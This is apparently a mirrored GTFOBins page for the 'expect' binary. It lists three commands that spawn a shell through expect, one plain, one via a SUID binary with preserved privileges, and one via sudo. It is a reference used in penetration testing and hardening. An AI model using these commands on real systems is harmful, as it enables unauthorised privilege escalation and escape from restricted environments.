This website requires JavaScript.
Explore
Help
Register
Sign In
mirror
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced
2026-01-10 01:11:34 +01:00
Code
Issues
14c8781f2d
GTFOBins.github.io
/
_gtfobins
/
expect.md
Andrea Cardaci
e1cd3aed68
Fix YAMLs according to YAMLlint
2018-07-16 15:01:50 +02:00
225 B
Raw
Blame
History
functions
execute-interactive
suid-enabled
sudo-enabled
code
expect -c 'spawn /bin/sh;interact'
code
./expect -c 'spawn /bin/sh -p;interact'
code
sudo expect -c 'spawn /bin/sh;interact'